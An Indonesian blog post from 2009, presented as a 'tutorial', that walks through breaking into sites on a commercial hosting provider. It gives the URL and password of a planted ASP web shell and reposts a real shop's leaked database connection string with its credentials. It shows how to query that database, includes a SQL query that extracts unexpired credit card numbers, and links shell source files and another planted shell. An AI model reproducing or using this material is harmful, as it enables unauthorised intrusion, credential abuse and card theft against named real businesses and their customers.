..::| Including Techno |::..
iMenu
Find...
iCategory
News [3]
Berita terkini ...
Tutorial [7]
all about tutorial...
Software [2]
all about software...
Hacking [2]
all about hacking stuff here...
Virus [1]
all about virus and how to solve...
Opini [4]
Opini dari saya...
Humor [2]
penghilang stress....
iCalender
«  September 2009  »
SuMoTuWeThFrSa
  12345
6789101112
13141516171819
20212223242526
27282930
iTranslate


Google PageRank Checker

iGo ...
Internet Sehat

Internet Sehat

Komunitas Blogger Indonesia

balaibahasabandung.web.id

iFriend
Blog - Uchyha

Main » 2009 » September » 4 » Hacking Webserver Edthosting
Hacking Webserver Edthosting
5:32 AM
tutorial hacking webserver edthosting (16) by ayief
sekalian tanya yah soalnya kemampuan ane cuma newbie doank

to de point ae lah

http://edtweb16dev267.edthosting.com/aspyku.asp

password : 4y13f34tsuz4n

jangan tanya gue lah dapat dari mana tuh,gmana caranya tuh bisa masukin (shell asp boleh di

bilang gitu ) pake donk logika kalian ok

lanjut...


https://www.essentialwhites.com

target cc (card credite) banyak di sono bisa panen sekalian,but masih buntu neh karena nomor

cc di sensor dan ccv nya di sensor...mari kita...web.config

coba perhatikan ini

<add key="DBConn" value="data source=EDTWEB16;initial catalog=essentialwhites;user

id=essen132;password=escom9287;persist security info=True;packet size=4096"/>

sekarang,mari kita bermain2 dengan "SQL Query Analyser" pada pojok kanan atas

pada kolom Paste your connection string here : isi dengan

Driver={SQL

Server};Server=EDTWEB16;Database=essentialwhites;DSN=;UID=essen132;PWD=escom9287;


alu klik table seperti gambar

nah sekarang...bagaimana mencari login adminnya...lihat gambar deh

http://img509.imageshack.us/img509/1065/46536516.jpg

tapi password terenskripsi, gimana caranya biar bisa...mari kita pecahkan bersama-sama

nah sekarang kita mencari cc di web tersebut...dan lihat gambar lagi
http://img509.imageshack.us/img509/4066/45776657.jpg

Code:

select OrderNumber, CardName, CardNumber, CardType, CustomerID, TransactionCommand 

from Orders where CardType NOT LIKE '%paypal%' and CardExpirationYear > '2009' order by

ordernumber
mari kita pecahkan bersama,sebenarnya edthosting ada 20an server...itu server ke - 16...di server 16 ada seratusan website,dan yang aktif ada puluhan doank...so enjoy

referensi

http://free.7host05.com/ayief/aspy%201.txt

http://free.7host05.com/ayief/aspy%202.txt

special buat

http://forum.cyberdos.org

http://snutz.us/

thxs to:

edantenanan

Vela iNC.



update link edt 17
http://www.mailordercorals.com/images/aspyku.asp


ayief

Category: Tutorial | Views: 1522 | Added by: trieari | Rating: 4.0/1 |
Total comments: 0
Only registered users can add comments.
[ Registration | Login ]
QuickContact

saya sedang
Entries archive
iPoll
Bagaimana tentang web baru saya?
Total of answers: 20
iShout


iStats


..::|Including Techno | WYSIWYGYour IP is 54.80.132.10|::..